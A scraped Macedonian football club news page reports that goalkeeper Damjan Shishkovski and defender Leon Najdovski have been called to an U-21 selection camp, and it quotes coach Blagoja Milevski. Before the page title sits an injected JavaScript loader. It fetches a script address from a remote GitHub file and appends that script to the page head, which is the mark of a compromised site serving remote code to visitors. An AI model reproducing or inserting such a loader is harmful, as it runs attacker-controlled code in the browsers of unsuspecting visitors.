;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Шишковски и Најдовски со повик во селективниот камп на У-21
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Шишковски и Најдовски со повик во селективниот камп на У-21

Двајца претставници на Работнички, голманот Дамјан Шишковски и дефанзивецот Леон Најдовски, се најдоа на списокот на селекторот Благоја Милевски за селективниот камп на младата фудбалска селекција до 21 година, кој ќе се одржи веднаш по завршувањето на есенскиот дел од шампионатот во Првата лига. Избраниците на Милевски ќе одиграат два пријателски натпревари, на 12.декември против Хоризонт Турново на стадионот во Велес и два дена подоцна против селекцијата на домашни фудбалери што ја селектираше Игор Ангеловски.

„Селективниот камп како и досега ќе биде од корист за сите кои сме вклучени во младата репрезентација и секако за повиканите играчи. На кампот ќе бидат присутни играчи кои не добиле повик или немале доволно минутажа за репрезентацијата до 21 година. Ова е добра можност да ги видиме потенцијалот и квалитетот на селектираните фудбалери и дали може да сметаме на дел од нив и на официјални натпревари. Стандардните реппрезентативци не се повикани бидејќи намерата на овој селективен камп е сосема поинаква, а и нивната форма и настапите постојано ги следиме, дел од нив се и на списокот на селекторот на А репрезентацијата. Во нашата селекција вклучивме дури девет играчи од генерацијата ’96 и ’97, фудбалери кои можат да бидат дел од новата генерација на младата репрезентација за идниот циклус квалификации и искрено се надевам дека ќе не убедат во своите квалитети“, изјави селекторот на репрезентацијата Благоја Милевски за официјалниот сајт на ФФМ.

Leave a Reply